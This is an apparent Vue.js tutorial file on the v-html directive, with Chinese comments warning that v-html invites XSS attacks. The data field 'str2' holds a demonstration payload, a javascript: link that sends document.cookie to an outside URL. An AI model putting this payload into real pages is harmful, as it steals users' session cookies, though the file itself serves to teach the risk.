<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>v-text</title>
    <script type="text/javascript" src="../vue.js"></script>
</head>

<!--
    v-html指令:
        1.作用：想指定节点中包含html结构的内容
        2.与插值语法的区别：
              （1）.v-html会替换掉节点中的所有内容，{{xx}} 则不会
              （2）.v-html可以识别html节构
        3.严重注意：v-html有安全性问题
            （1）.在网站上动态渲染任意html是非常危险的，容易导致xss攻击
            （2）.一定要在可信的内容上使用v-html，永远不要用在用户提交的内容上
-->
<body>
<!-- 准备好 一个容器-->
<div id="root">
    <div>123  {{name}}  123</div>
    <div v-html="str"></div>
    <div v-html="str2"></div>

</div>

</body>


<script type="text/javascript">

    Vue.config.productionTip = false //设置为 false 以阻止 vue 在启动时生成生产提示。

    //创建Vue实例
    new Vue({
        el:'#root',
        data:{
            name:'itshumm',
            str:'<h3>你好</h3>',
            str2:'<a href=javascript:location.href="https://www.baidu.com?"+document.cookie>我这里有东西</a>'
        }
    })

</script>

</html>
